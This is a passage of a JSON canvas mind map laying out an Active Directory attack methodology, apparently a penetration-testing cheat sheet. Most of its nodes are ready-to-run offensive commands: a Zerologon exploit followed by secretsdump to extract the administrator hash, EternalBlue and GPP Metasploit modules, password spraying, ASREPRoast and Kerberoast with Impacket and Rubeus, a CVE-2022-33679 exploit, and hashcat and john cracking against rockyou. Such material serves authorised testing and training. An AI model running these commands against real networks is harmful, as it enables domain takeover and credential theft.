{"type":"text","text":"Low Access","id":"6ae2f33ef66afb2c","x":1651,"y":-785,"width":250,"height":60,"color":"#969292"},
{"type":"text","text":"Low hanging fruit","id":"7c7d2ce9046d09ae","x":24,"y":-1090,"width":250,"height":60,"color":"4"},
{"type":"text","text":"SYSVOL & GPP\nMS14-025","id":"3caa527de4a49425","x":387,"y":-1449,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"Proxylogon","id":"44ad3d1ccfdcec6b","x":387,"y":-912,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"```metasploit\nexploit/multi/misc/java_rmi_server\n```","id":"0c64d7ae6aacf7b9","x":676,"y":-1147,"width":381,"height":50},
{"type":"text","text":"```metasploit\nuse scanner/smb/smb_enum_gpp\n```","id":"9698369517d0d209","x":714,"y":-1474,"width":1172,"height":50},
{"type":"text","text":"```metasploit\nexploit/windows/smb/ms17_010_eternalblue\n```","id":"e954899ef3d352d9","x":714,"y":-1557,"width":1172,"height":50},
{"type":"text","text":"etc....","id":"1aee0c2bf40730f3","x":387,"y":-592,"width":250,"height":60},
{"type":"text","text":"```bash\nzerologon-scan '<dc_netbios_name>' $ip\n```","id":"0d4ed1ab9c56f993","x":714,"y":-1905,"width":586,"height":50},
{"type":"text","text":"```bash\npython3 cve-2020-1472-exploit.py <MACHINE_BIOS_NAME> $ip\n```\n\n```bash \nsecretsdump.py <DOMAIN>/<MACHINE_BIOS_NAME>\\$@<IP> -no-pass -just-dc-user \"administrator\"\n```\n\n```bash\nsecretsdump.py -hashes:<HASH_admin> <DOMAIN>/administrator@$ip\n```\n","id":"08a793f6de33ca4c","x":714,"y":-1833,"width":771,"height":233},
{"type":"text","text":"Eternal Blue\nMS17-010","id":"312360df0fd70d52","x":387,"y":-1562,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"zerologon (unsafe: exploitation resets the DC machine account password and can break the domain controller)\n(CVE-2020-1472)","id":"c302052b9b4b0337","x":387,"y":-1855,"width":250,"height":75,"color":"#7c0404"},
{"type":"text","text":"Get hash","id":"d92c09bbf9f06ed9","x":664,"y":1194,"width":250,"height":50},
{"type":"text","text":"Blind Kerberoasting","id":"82c4151634122acd","x":664,"y":1395,"width":250,"height":60,"color":"5"},
{"type":"text","text":"```bash\ncrackmapexec smb <dc-ip> -u user.txt -p password.txt --no-bruteforce\n```","id":"8d25cd7559182320","x":691,"y":582,"width":620,"height":50},
{"type":"text","text":"```powershell\nGet-ADFineGrainedPasswordPolicy -filter *\n```","id":"b988ce3d097af85e","x":1325,"y":342,"width":468,"height":50},
{"type":"text","text":"```powershell\nGet-ADUserResultantPasswordPolicy -Identity <user>\n```","id":"87d700b115294633","x":1325,"y":422,"width":468,"height":50},
{"type":"text","text":"```bash\nldapsearch-ad.py --server '<dc>' -d <domain> -u <user> -p <pass> --type pass-pols\n```","id":"5473d0f9049f89a3","x":1325,"y":497,"width":468,"height":64},
{"type":"text","text":"Hash found (TGS)","id":"4739cb7c3c19787c","x":1587,"y":1364,"width":174,"height":87,"color":"2"},
{"type":"text","text":"Clear text credentials found","id":"afb4a85b3dfc3809","x":1439,"y":670,"width":296,"height":60,"color":"#37ff00"},
{"type":"text","text":"```PowerView\nGet-DomainUser -PreauthNotRequired -Properties SamAccountName\n```","id":"c11262a9f09b1fae","x":1049,"y":885,"width":523,"height":82},
{"type":"text","text":"```bloodhound\nMATCH (u:User{dontreqpreauth:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p\n```","id":"142fd2c7b0128f90","x":1049,"y":1003,"width":523,"height":82},
{"type":"text","text":"Hash found (ASREP)","id":"74c64308221cb1a0","x":1587,"y":1158,"width":204,"height":86,"color":"2"},
{"type":"text","text":"```bash\nGetUserSPNs.py -no-preauth \"<asrep_user>\"-userfile \"<user_list.txt>\"-dc-host \"<dc-ip>\" \"<domain>\"\n```","id":"e979e1c36be17d6b","x":988,"y":1425,"width":523,"height":82},
{"type":"text","text":"```bash\ncrackmapexec $ip -u 'user'-p 'password' --pass-pol\n```","id":"810c93f7e485fb07","x":1169,"y":132,"width":479,"height":50},
{"type":"text","text":"```bash\nenum4linux -u 'username' -p 'password' -P $ip\n```","id":"3b824c95aeceb06f","x":1169,"y":208,"width":479,"height":50},
{"type":"text","text":"```powershell\nGet-ADDefaultDomainPasswordPolicy\n```","id":"1d61026376460ddc","x":1169,"y":277,"width":479,"height":50},
{"type":"text","text":"FGPP","id":"fcbe5c360e799d0c","x":1169,"y":417,"width":87,"height":60,"color":"5"},
{"type":"text","text":"Get password policy (need creds, but you should get the policy before starting a spray)","id":"435409a34a85bee5","x":700,"y":258,"width":390,"height":69,"color":"5"},
{"type":"text","text":"```bash\nRubeus.exe keberoast /domain:<domain> /dc:<dcip> /nopreauth:<asrep_user> /spns:<users.txt>\n```","id":"2f85a7beecb47420","x":988,"y":1323,"width":523,"height":82},
{"type":"text","text":"```bash\nsprayhound -U <users.txt> -d <domain> -dc <dc-ip>\n```","id":"03094d327110f677","x":691,"y":784,"width":523,"height":76},
{"type":"text","text":"```bash\ncrackmapexec smb <dc-ip> -u user.txt -p password.txt\n```","id":"170bdb7e4ccb0c18","x":691,"y":679,"width":523,"height":51},
{"type":"text","text":"```bash\nGetUserSPNs.py <domain>/ -usersfile <usernames.txt> -format hashcat -outputfile <hashes.domain.txt>\n```","id":"de738177fe56c369","x":988,"y":1112,"width":523,"height":82},
{"type":"text","text":"```bash\nRubeus.exe asreproast /format:hashcat\n```","id":"ef4cea23eb6a6378","x":988,"y":1244,"width":523,"height":57},
{"type":"text","text":"```bash\nhashcat -m 3000 -a 3 hash.txt rockyou.txt\n```","id":"909e585839408cc8","x":2915,"y":1363,"width":552,"height":50},
{"type":"text","text":"ASREPRoast","id":"74ea24bfce8e6162","x":361,"y":1283,"width":171,"height":60,"color":"5"},
{"type":"text","text":"Password spray","id":"c433af615eb2ef45","x":361,"y":388,"width":184,"height":60,"color":"5"},
{"type":"text","text":"Got valid username","id":"88f13b27794d5766","x":98,"y":964,"width":164,"height":60,"color":"#31dbdd"},
{"type":"text","text":"```bash\njohn --format=lm hash.txt\n```","id":"a4f015a2da4a7352","x":2915,"y":1283,"width":552,"height":50},
{"type":"text","text":"Get ASREPRoastable users (need creds)","id":"0e8b87ca20123bc2","x":653,"y":962,"width":335,"height":62},
{"type":"text","text":"```bash\npython3 CVE-2022-33679.py <domain>/<user> <target>\n```","id":"1f322488c9295b4a","x":952,"y":1536,"width":491,"height":90},
{"type":"text","text":"CVE-2022-33679","id":"6d71e75660388b2e","x":664,"y":1551,"width":250,"height":60,"color":"#7c0404"},
{"type":"text","text":"Lateral move (PTT)","id":"11326779f0bcb47a","x":1511,"y":1551,"width":250,"height":60,"color":"#484e7f"},
{"type":"text","text":"```bash\njohn --format=nt hash.txt\n```","id":"9077485b47bbd068","x":2915,"y":1444,"width":552,"height":50},
{"type":"text","text":"```bash\nhashcat -m 1000 -a 3 hash.txt rockyou.txt\n```","id":"8aef7b94299bb1b3","x":2915,"y":1524,"width":552,"height":50},
{"type":"text","text":"```bash\njohn --format=netntlm hash.txt\n```","id":"62f5191c11944cfd","x":2915,"y":1635,"width":552,"height":50},
{"type":"text","text":"```bash\nhashcat -m 5500 -a 3 hash.txt rockyou.txt\n```","id":"209d7bca7fb52ac5","x":2915,"y":1715,"width":552,"height":50},
{"type":"text","text":"Kerberos 5 TGS","id":"82c0786a65635033","x":2559,"y":2000,"width":250,"height":60,"color":"2"},
{"type":"text","text":"```bash\nhashcat -m 13100 -a 0 spn.txt rockyou.txt\n```","id":"b6cde9eadb3abe3c","x":2915,"y":2045,"width":552,"height":50},
{"type":"text","text":"Kerberos 5 TGS AES128","id":"4c001130035fcf35","x":2559,"y":2128,"width":250,"height":60,"color":"2"},
{"type":"text","text":"```bash\njohn --format=krb5tgs spn.txt --wordlist=rockyou.txt\n```","id":"5adb8632cd597518","x":2915,"y":1965,"width":552,"height":50},
{"type":"text","text":"```bash\nhashcat -m 5600 -a 0 hash.txt rockyou.txt\n```","id":"6b95c62f0322463b","x":2915,"y":1884,"width":552,"height":50},
{"type":"text","text":"```bash\njohn --format=netntlmv2 hash.txt\n```","id":"04d82baa209275fc","x":2915,"y":1804,"width":552,"height":50},
{"type":"text","text":"LM","id":"1446fea94896a358","x":2559,"y":1318,"width":250,"height":60,"color":"2"},
{"type":"text","text":"NTLM","id":"06346ae3417f3a6f","x":2559,"y":1479,"width":250,"height":60,"color":"2"},
{"type":"text","text":"NetNTLMv1","id":"ad0336fabea1533c","x":2559,"y":1670,"width":250,"height":60,"color":"2"},
{"type":"text","text":"```bash\nhashcat -m 19600 -a 0 spn.txt rockyou.txt\n```","id":"bb5cb33074002f42","x":2915,"y":2133,"width":552,"height":50},
{"type":"text","text":"Crack hash","id":"1394a4460b5c048b","x":2265,"y":1839,"width":164,"height":60,"color":"2"},
{"type":"text","text":"NetNTLMv2","id":"569259c7e1c77756","x":2559,"y":1839,"width":250,"height":60,"color":"2"},
{"type":"text","text":"User account clear text password","id":"75ba5121af55828d","x":3680,"y":1829,"width":232,"height":70,"color":"4"},
{"type":"text","text":"User account clear text password","id":"e4796d34e2b5a881","x":3442,"y":-5916,"width":232,"height":70,"color":"4"},
{"type":"text","text":"Search password files","id":"2551912deeeec43a","x":2474,"y":-5911,"width":250,"height":60}
],
"edges":[
{"id":"e6bd9159a1e75674","fromNode":"3b3430ebb774c3bc","fromSide":"right","toNode":"e1444e1f11d2ee45","toSide":"left"},
{"id":"db32078e0f8f2632","fromNode":"3b3430ebb774c3bc","fromSide":"right","toNode":"79bd3d2569ff33ff","toSide":"left"},
{"id":"eed17e16eec7d6f1","fromNode":"3b3430ebb774c3bc","fromSide":"right","toNode":"e34cd4be899de1b1","toSide":"left"},
{"id":"5059318dc41c64e1","fromNode":"3b3430ebb774c3bc","fromSide":"right","toNode":"970caa7ff00527ff","toSide":"left"},
{"id":"c03a0c3cc69b090f","fromNode":"3b3430ebb774c3bc","fromSide":"right","toNode":"5aea1cf60aabd994","toSide":"left"},
{"id":"861ac2d2c05f127b","fromNode":"3b3430ebb774c3bc","fromSide":"right","toNode":"2cadfd052197f008","toSide":"left"},
{"id":"e45ffe0d476aa6e6","fromNode":"3b3430ebb774c3bc","fromSide":"right","toNode":"09bbbed589f90ee7","toSide":"left"},
{"id":"acbb43d3340e7b97","fromNode":"09bbbed589f90ee7","fromSide":"right","toNode":"e28615a1a57b8503","toSide":"left"},
{"id":"e6bc0df534e53515","fromNode":"2cadfd052197f008","fromSide":"right","toNode":"e28615a1a57b8503","toSide":"left"},
{"id":"37cd9a24fb6b1751","fromNode":"5aea1cf60aabd994","fromSide":"right","toNode":"e28615a1a57b8503","toSide":"left"},
{"id":"193ea202313ab402","fromNode":"970caa7ff00527ff","fromSide":"right","toNode":"e28615a1a57b8503","toSide":"left"},
{"id":"7602ad83f204cbcb","fromNode":"e34cd4be899de1b1","fromSide":"right","toNode":"e28615a1a57b8503","toSide":"left"},
{"id":"e7f25e935b745c5c","fromNode":"79bd3d2569ff33ff","fromSide":"right","toNode":"e28615a1a57b8503","toSide":"left"},
{"id":"878fe7e7b0d169cf","fromNode":"d49852cf325e5f86","fromSide":"right","toNode":"ac88013e301f4359","toSide":"left"},
{"id":"f4fec756dd6c87d9","fromNode":"9f3bade1a260738f","fromSide":"right","toNode":"3a42b30472341f68","toSide":"left"},
{"id":"16fac5af8f699d62","fromNode":"9f3bade1a260738f","fromSide":"right","toNode":"552dbd3bdd5243b3","toSide":"left"},
{"id":"417f7adcd6064e60","fromNode":"71c17a9669754889","fromSide":"right","toNode":"7ea9e3211107b13f","toSide":"left"},
{"id":"07041801abbc0fa2","fromNode":"8e9ea2e9822ae2b1","fromSide":"right","toNode":"de65e76747b04d9e","toSide":"left"},
{"id":"7d724c2f30fa053b","fromNode":"8e9ea2e9822ae2b1","fromSide":"right","toNode":"d70f0e48b88f0c2b","toSide":"left"},
{"id":"059e69aaf69da17f","fromNode":"8e9ea2e9822ae2b1","fromSide":"right","toNode":"303ddccb2f582faa","toSide":"left"},
{"id":"6762e654136cecb8","fromNode":"8e9ea2e9822ae2b1","fromSide":"right","toNode":"19c2801d90c6dac8","toSide":"left"},
{"id":"accf5fe967afbff4","fromNode":"8e9ea2e9822ae2b1","fromSide":"right","toNode":"8af125cfcc7ef6d1","toSide":"left"},
{"id":"74e3f8e346fa6ebd","fromNode":"75b8a1968a27ce2f","fromSide":"right","toNode":"afad5fb61a5b41c8","toSide":"left"},
{"id":"a5a7206a457c6280","fromNode":"75b8a1968a27ce2f","fromSide":"right","toNode":"0ea07e6ccb96eb5e","toSide":"left"},
{"id":"23b4dce3d3aad44c","fromNode":"afad5fb61a5b41c8","fromSide":"right","toNode":"e33d5d29466126f4","toSide":"left"},
{"id":"e1fb270600b8a6b3","fromNode":"0ea07e6ccb96eb5e","fromSide":"right","toNode":"e33d5d29466126f4","toSide":"left"},
{"id":"65df31c7ebdb35eb","fromNode":"e33d5d29466126f4","fromSide":"right","toNode":"a648cb90f6797cf5","toSide":"left","color":"#31dbdd"},
{"id":"7bf71f9aa60b1b92","fromNode":"e28615a1a57b8503","fromSide":"right","toNode":"2eeaf30e7d43aa1e","toSide":"left","color":"4"},
{"id":"1168c3bd3fd30850","fromNode":"bc52dd330dabaa5e","fromSide":"right","toNode":"d3eda11a689e3213","toSide":"left"},
{"id":"e204ccefc85e2e91","fromNode":"bc52dd330dabaa5e","fromSide":"right","toNode":"640fde233349daf8","toSide":"left"},
{"id":"f52fa90fdad7b53c","fromNode":"bc52dd330dabaa5e","fromSide":"right","toNode":"9c0090a0701fc05a","toSide":"left"},
{"id":"cfcbaefd90d53a53","fromNode":"bc52dd330dabaa5e","fromSide":"right","toNode":"ef4d1435f4127e9c","toSide":"left"},
{"id":"a192d8bc2212391c","fromNode":"ef4d1435f4127e9c","fromSide":"right","toNode":"7663efa4fca553c8","toSide":"left"},
{"id":"51fb644e8f067ac7","fromNode":"7663efa4fca553c8","fromSide":"right","toNode":"475c8040ecef93ce","toSide":"left"},
{"id":"2486029c0770ebd9","fromNode":"9c0090a0701fc05a","fromSide":"right","toNode":"475c8040ecef93ce","toSide":"left"},
{"id":"42b5c39f5eb54cd9","fromNode":"640fde233349daf8","fromSide":"right","toNode":"475c8040ecef93ce","toSide":"left"},
{"id":"ef926f8dc55afb2f","fromNode":"d3eda11a689e3213","fromSide":"right","toNode":"475c8040ecef93ce","toSide":"left"},
{"id":"ae12c71fb6e8105d","fromNode":"475c8040ecef93ce","fromSide":"right","toNode":"a648cb90f6797cf5","toSide":"left","color":"5"},
{"id":"108d7d4ad6c26861","fromNode":"12acd8fe356c1bfc","fromSide":"right","toNode":"44d7daa03cbf639b","toSide":"left"},
{"id":"4314b643a235fcc6","fromNode":"12acd8fe356c1bfc","fromSide":"right","toNode":"c4b69d972e7ee1e9","toSide":"left"},
{"id":"bd2a8770492171fb","fromNode":"12acd8fe356c1bfc","fromSide":"right","toNode":"5ffdaedfa603d595","toSide":"left"},
{"id":"b2403b58141ecaee","fromNode":"44d7daa03cbf639b","fromSide":"right","toNode":"f95aa1b75c2a67b8","toSide":"left"},
{"id":"30e1a1971e311ea4","fromNode":"44d7daa03cbf639b","fromSide":"right","toNode":"545e543172dc6d51","toSide":"left"},
{"id":"59b4872c6d8099cd","fromNode":"f95aa1b75c2a67b8","fromSide":"right","toNode":"ff4e51f72dab03cf","toSide":"left"},
{"id":"081664a22368edbb","fromNode":"545e543172dc6d51","fromSide":"right","toNode":"ff4e51f72dab03cf","toSide":"left"},
{"id":"eddf8e62869b8e02","fromNode":"c4b69d972e7ee1e9","fromSide":"right","toNode":"9b97556bfac9f9d8","toSide":"left"},
{"id":"61cec79c1ec86fd0","fromNode":"9b97556bfac9f9d8","fromSide":"right","toNode":"ff4e51f72dab03cf","toSide":"left"},
{"id":"5aa65f7592401398","fromNode":"5ffdaedfa603d595","fromSide":"right","toNode":"5f17da44a3fac888","toSide":"left"},
{"id":"c264bb230f689084","fromNode":"5f17da44a3fac888","fromSide":"right","toNode":"ff4e51f72dab03cf","toSide":"left"},
{"id":"58b820408ce52cb2","fromNode":"6a7277f50eb06e79","fromSide":"right","toNode":"b5259f511998e728","toSide":"left"},
{"id":"5a24f402567c20b4","fromNode":"b5259f511998e728","fromSide":"right","toNode":"18213f5195f600ba","toSide":"left"},
{"id":"1d5fe7d940ecd6bf","fromNode":"18213f5195f600ba","fromSide":"right","toNode":"0c0ab88c019d8df8","toSide":"left"},
{"id":"162b399aa19c2400","fromNode":"0c0ab88c019d8df8","fromSide":"right","toNode":"3de84bfe460894aa","toSide":"left","color":"3"},
{"id":"b9fd81ee8b9830fe","fromNode":"ff4e51f72dab03cf","fromSide":"right","toNode":"3de84bfe460894aa","toSide":"left","color":"3"},
{"id":"6f129f781e28637a","fromNode":"4a5c61595a84f24b","fromSide":"right","toNode":"d00cf0b295950050","toSide":"left"},
{"id":"6acbba6a8ca5353d","fromNode":"243546a3742534e4","fromSide":"right","toNode":"4206fa0a2cbba7e0","toSide":"left"},
{"id":"87433467a6553801","fromNode":"243546a3742534e4","fromSide":"right","toNode":"581059a1f1f61cd8","toSide":"left"},
{"id":"8f8e83fa1c07e65a","fromNode":"243546a3742534e4","fromSide":"right","toNode":"42b163c28a6085d0","toSide":"left"},
{"id":"b6f2f39a5d6e1fef","fromNode":"4a5c61595a84f24b","fromSide":"right","toNode":"394eb6dedb87ac1e","toSide":"left"},
{"id":"a34e53a6627b77e2","fromNode":"4a5c61595a84f24b","fromSide":"right","toNode":"1c4d6f661b1e09b8","toSide":"left"},
{"id":"cc7c26545549eb12","fromNode":"8d43cc23f6800e6a","fromSide":"right","toNode":"6208b8ec8cb8bd51","toSide":"left"},
{"id":"2f3356408ac7d229","fromNode":"581059a1f1f61cd8","fromSide":"right","toNode":"fc566e1c8a5a13c8","toSide":"left"},
{"id":"6f2d036fc99262d4","fromNode":"4206fa0a2cbba7e0","fromSide":"right","toNode":"fc566e1c8a5a13c8","toSide":"left"},
{"id":"d744be4d93b2ce2d","fromNode":"42b163c28a6085d0","fromSide":"right","toNode":"fc566e1c8a5a13c8","toSide":"left"},
{"id":"5efc093bec43f345","fromNode":"fc566e1c8a5a13c8","fromSide":"right","toNode":"6cd7aae84eb27967","toSide":"left"},
{"id":"1af2111ea5d99054","fromNode":"fc566e1c8a5a13c8","fromSide":"right","toNode":"406a3ccd2d14dac8","toSide":"left"},
{"id":"bb8f4c44167dedbc","fromNode":"fc566e1c8a5a13c8","fromSide":"right","toNode":"3d7d2fc5a1b39405","toSide":"left"},
{"id":"96969dadaf8aa861","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"c302052b9b4b0337","toSide":"left"},
{"id":"a08adbcc7a49fa89","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"312360df0fd70d52","toSide":"left"},
{"id":"f67b3eb976d3de2a","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"3caa527de4a49425","toSide":"left"},
{"id":"6473538d81711186","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"4fb20b49e923c7d0","toSide":"left"},
{"id":"ad534e614a97ef92","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"c4991b5a4f896f90","toSide":"left"},
{"id":"de37cb3f1f124688","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"887aa0fd1d482358","toSide":"left"},
{"id":"9fae76e866bd256e","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"3d1eaa1120a48ec0","toSide":"left"},
{"id":"d66cc6336be16038","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"44ad3d1ccfdcec6b","toSide":"left"},
{"id":"b9c86429fe0debcc","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"da3003709756312e","toSide":"left"},
{"id":"9997cd33a4e59b6c","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"1c6039eb70b8e8b4","toSide":"left"},
{"id":"4d908193d2a85d31","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"a971808f69b49a66","toSide":"left"},
{"id":"49d47cbc9ef978ef","fromNode":"7c7d2ce9046d09ae","fromSide":"right","toNode":"1aee0c2bf40730f3","toSide":"left"},
{"id":"138fbbdfc5995e45","fromNode":"88f13b27794d5766","fromSide":"right","toNode":"c433af615eb2ef45","toSide":"left"},
{"id":"0b47dddd3fb6b9f8","fromNode":"88f13b27794d5766","fromSide":"right","toNode":"74ea24bfce8e6162","toSide":"left"},
{"id":"6cabd56699212e65","fromNode":"74ea24bfce8e6162","fromSide":"right","toNode":"6d71e75660388b2e","toSide":"left"},
{"id":"3e52b9f3b175f3b3","fromNode":"74ea24bfce8e6162","fromSide":"right","toNode":"82c4151634122acd","toSide":"left"},
{"id":"e72c58b5e17d1663","fromNode":"74ea24bfce8e6162","fromSide":"right","toNode":"d92c09bbf9f06ed9","toSide":"left"},
{"id":"744c37e76481026f","fromNode":"74ea24bfce8e6162","fromSide":"right","toNode":"0e8b87ca20123bc2","toSide":"left"},
{"id":"9229a83414f10c4b","fromNode":"6d71e75660388b2e","fromSide":"right","toNode":"1f322488c9295b4a","toSide":"left"},
{"id":"9f7653aa18be8853","fromNode":"1f322488c9295b4a","fromSide":"right","toNode":"11326779f0bcb47a","toSide":"left"},
{"id":"6dc8c43f17746e23","fromNode":"82c4151634122acd","fromSide":"right","toNode":"e979e1c36be17d6b","toSide":"left"},
{"id":"95220f4c412ddb84","fromNode":"82c4151634122acd","fromSide":"right","toNode":"2f85a7beecb47420","toSide":"left"},
{"id":"adf831bb85796140","fromNode":"e979e1c36be17d6b","fromSide":"right","toNode":"4739cb7c3c19787c","toSide":"left"},
{"id":"61bd1b90a010956e","fromNode":"2f85a7beecb47420","fromSide":"right","toNode":"4739cb7c3c19787c","toSide":"left"},
{"id":"0357181d11d4b0b0","fromNode":"d92c09bbf9f06ed9","fromSide":"right","toNode":"ef4cea23eb6a6378","toSide":"left"},
{"id":"78bd7d47c195e9c1","fromNode":"d92c09bbf9f06ed9","fromSide":"right","toNode":"de738177fe56c369","toSide":"left"},
{"id":"f94f0d2ff53af4d5","fromNode":"ef4cea23eb6a6378","fromSide":"right","toNode":"74c64308221cb1a0","toSide":"left"},
{"id":"0ee1e23b8db3fd73","fromNode":"de738177fe56c369","fromSide":"right","toNode":"74c64308221cb1a0","toSide":"left"},
{"id":"fa2fc8215278e3b3","fromNode":"0e8b87ca20123bc2","fromSide":"right","toNode":"142fd2c7b0128f90","toSide":"left"},
{"id":"d37ad65a15fda438","fromNode":"0e8b87ca20123bc2","fromSide":"right","toNode":"c11262a9f09b1fae","toSide":"left"},
{"id":"7f85ceabeed8405f","fromNode":"c433af615eb2ef45","fromSide":"right","toNode":"03094d327110f677","toSide":"left"},
{"id":"0910128a198678e0","fromNode":"c433af615eb2ef45","fromSide":"right","toNode":"170bdb7e4ccb0c18","toSide":"left"},
{"id":"5e385efb94a02a3b","fromNode":"c433af615eb2ef45","fromSide":"right","toNode":"8d25cd7559182320","toSide":"left"},
{"id":"3ef9988060730735","fromNode":"c433af615eb2ef45","fromSide":"right","toNode":"435409a34a85bee5","toSide":"left"},
{"id":"f8fc99a3549495b5","fromNode":"8d25cd7559182320","fromSide":"right","toNode":"afb4a85b3dfc3809","toSide":"left"},
{"id":"5a2a35a8c132ac14","fromNode":"170bdb7e4ccb0c18","fromSide":"right","toNode":"afb4a85b3dfc3809","toSide":"left"},
{"id":"cfac2afa55c882c3","fromNode":"03094d327110f677","fromSide":"right","toNode":"afb4a85b3dfc3809","toSide":"left"},
{"id":"75854f5dcc7cd474","fromNode":"435409a34a85bee5","fromSide":"right","toNode":"810c93f7e485fb07","toSide":"left"},
{"id":"73a677f7745f1dd5","fromNode":"435409a34a85bee5","fromSide":"right","toNode":"3b824c95aeceb06f","toSide":"left"},
{"id":"a19f4b4fea44a034","fromNode":"435409a34a85bee5","fromSide":"right","toNode":"1d61026376460ddc","toSide":"left"},
{"id":"cf50b11c46f0389e","fromNode":"435409a34a85bee5","fromSide":"right","toNode":"fcbe5c360e799d0c","toSide":"left"},
{"id":"858441e3a925bc30","fromNode":"fcbe5c360e799d0c","fromSide":"right","toNode":"87d700b115294633","toSide":"left"},
{"id":"73cd733e86843d96","fromNode":"fcbe5c360e799d0c","fromSide":"right","toNode":"b988ce3d097af85e","toSide":"left"},
{"id":"a7bfc1eb80db1b49","fromNode":"fcbe5c360e799d0c","fromSide":"right","toNode":"5473d0f9049f89a3","toSide":"left"},
{"id":"bf8741ee99d3ab69","fromNode":"a648cb90f6797cf5","fromSide":"right","toNode":"dbaced8dfb7fd663","toSide":"left","color":"2"},
{"id":"81634bd45c3de4a3","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"1446fea94896a358","toSide":"left"},
{"id":"abdfcab66e4c5222","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"06346ae3417f3a6f","toSide":"left"},
{"id":"eeb4a914224bb1cb","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"ad0336fabea1533c","toSide":"left"},
{"id":"a507ca846509ca95","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"569259c7e1c77756","toSide":"left"},
{"id":"854001899ede95a6","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"82c0786a65635033","toSide":"left"},
{"id":"c1b4cab9c2b475f1","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"4c001130035fcf35","toSide":"left"},
{"id":"5e0602bfcfe7c2d8","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"bd74d584cfd459a0","toSide":"left"},
{"id":"fdfdae8edf1d14d4","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"1b82ebdd45787434","toSide":"left"},
{"id":"fdd1495a1e42b325","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"e6fc699570842d2b","toSide":"left"},
{"id":"99668cc020cd3b42","fromNode":"e6fc699570842d2b","fromSide":"right","toNode":"524718ecdc2c84c8","toSide":"left"},
{"id":"a33d7dc09b726c17","fromNode":"1b82ebdd45787434","fromSide":"right","toNode":"6536b70581b33332","toSide":"left"},
{"id":"6d2f5a0c2b91c102","fromNode":"bd74d584cfd459a0","fromSide":"right","toNode":"158b16fd4dd21d5a","toSide":"left"},